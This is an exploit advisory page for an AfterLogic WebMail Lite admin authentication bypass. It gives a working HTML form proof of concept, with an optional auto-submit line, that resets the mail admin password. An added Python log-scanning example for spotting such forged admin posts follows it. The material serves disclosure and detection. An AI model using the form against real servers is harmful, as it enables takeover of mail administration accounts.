AfterLogic WebMail Lite Authentication Bypass

27 Mar 2015 | Reported by Paulos Yibelo | Type: packetstorm | Source: packetstormsecurity.com

AfterLogic WebMail Lite Authentication Bypass on PHP and ASP.NET platforms

Code
`AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client  
with Ajax interface. AfterLogic WebMail Lite is available for both PHP  
and ASP.NET platforms.  
  
The version of AfterLogic WebMail Lite that is written in PHP is free  
and open-source software subject to the terms of the Affero General  
Public License (AGPL) version 3. The version written in ASP.NET is  
proprietary software available as freeware.  
  
It is deployed on over 5/20 mail servers and is quite popular.  
  
This exploit attempts to set a new password for the admin account,  
giving access to the admin panel, which should be located at  
site.com/mail/adminpanel/index.php  
  
<h2>After Logic Mail - Change Admin Password Exploit</h2>  
<form action="http://localhost/webmail/adminpanel/index.php?submit"  
method="POST" id="security_form">  
<input type="hidden" name="form_id" value="security">  
<input type="text" class="wm_input" name="txtUserName"  
id="txtUserName" value="mailadm" size="30" />  
<input type="password" class="wm_input" name="txtNewPassword"  
id="txtNewPassword" value="newpass" size="30" />  
<input type="password" class="wm_input" name="txtConfirmNewPassword"  
id="txtConfirmNewPassword" value="newpass" size="30" />  
<input type="submit" name="submit_btn" value="Save" id="automate">  
</form>  
<script>  
//uncomment the second line for automation  
//document.getElementById('automate').click();  
</script>  
`
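For triage on a server running the affected admin panel, the following added example (not part of the original advisory) scans access-log lines for POSTs to `adminpanel/index.php?submit` that did not come from the site's own pages, which is how a form hosted elsewhere would appear. It assumes Combined Log Format; the host name `mail.example.test`, the function names, and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

def is_admin_submit(method, target):
    """True for POST .../adminpanel/index.php?submit, the request the PoC form sends."""
    parts = urlsplit(target)
    keys = [p.split("=")[0] for p in parts.query.split("&")]
    return (method == "POST"
            and parts.path.lower().endswith("/adminpanel/index.php")
            and "submit" in keys)

def find_suspect_posts(log_lines, site_host):
    """Return (ip, time, reason) for admin form posts not sent from the panel's own pages."""
    hits = []
    for line in log_lines:
        m = LINE_RE.match(line.strip())
        if not m or not is_admin_submit(m["method"], m["target"]):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "no referer"
        elif urlsplit(referer).hostname != site_host:
            reason = "foreign referer"
        else:
            continue  # posted from the site's own pages
        hits.append((m["ip"], m["time"], reason))
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Mar/2015:10:00:01 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 200 512 "http://mail.example.test/webmail/adminpanel/index.php" "Mozilla/5.0"',
    '198.51.100.7 - - [27/Mar/2015:10:05:42 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Mar/2015:10:07:13 +0000] "POST /webmail/adminpanel/index.php?submit HTTP/1.1" 302 0 "http://other.example.test/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [27/Mar/2015:10:09:00 +0000] "GET /webmail/adminpanel/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspect_posts(SAMPLE_LOG, "mail.example.test"):
        print(hit)
```

Access logs do not record the POST body, so this cannot tell the `security` form apart from other admin-panel forms, and a Referer header can be set by the client. Treat each hit as a lead to correlate with admin password changes, not as proof.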
